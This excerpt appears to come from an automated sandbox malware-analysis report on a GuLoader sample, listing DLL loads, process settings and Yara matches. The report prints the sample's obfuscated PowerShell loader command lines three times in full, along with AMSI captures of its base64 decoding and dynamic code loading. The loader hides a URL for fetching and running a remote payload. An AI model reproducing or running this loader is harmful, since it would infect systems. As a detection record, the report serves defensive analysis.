              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: comsvcs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmlua.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: stem.Core.pdb's source: powershell.exe, 00000005.00000002.2550293525.000000000790D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2150718779.000001D40D721000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2154799674.000001D40B882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2154578700.000001D40B882000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdb source: powershell.exe, 00000005.00000002.2550293525.000000000790D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.2423263275.00000298B848E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ystem.pdbb source: powershell.exe, 00000002.00000002.2421753181.00000298B8208000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2550293525.0000000007859000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2550293525.0000000007859000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000005.00000002.2559922258.000000000A849000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2558798710.0000000008C10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2543351346.0000000005D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2415519775.00000298AFCC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Sleuthhound)$gLObaL:UNSeCrETED = [SYSTeM.tEXT.eNcODiNg]::aScii.GETSTRiNG($foReGGlingENS)$GloBAL:EUrOpAmESTERens=$uNSecRetEd.suBSTrinG($ThIMOTHeuSSnDSAmlES,$DesmoLase)<#Juxtapositiona
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((corgi $Sanktvejtsdans $Rethaveres), (Blueline @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Discourteousness = [AppDomain]::CurrentDomain.GetAssemblies()
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Trailway)), $Destillerier).DefineDynamicModule($Vestkystens, $false).DefineType($Unacerbically, $checkerberries, [System.MulticastDele
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Sleuthhound)$gLObaL:UNSeCrETED = [SYSTeM.tEXT.eNcODiNg]::aScii.GETSTRiNG($foReGGlingENS)$GloBAL:EUrOpAmESTERens=$uNSecRetEd.suBSTrinG($ThIMOTHeuSSnDSAmlES,$DesmoLase)<#Juxtapositiona
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW peri
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW peri
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07822BC8 push eax; ret 5_2_07822BC9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_092E2966 push 0000003Ch; ret 5_2_092E2968
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_092E0A1D push edx; retf 5_2_092E0A2C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_04460A1D push edx; retf 8_2_04460A2C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_04462966 push 0000003Ch; ret 8_2_04462968
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
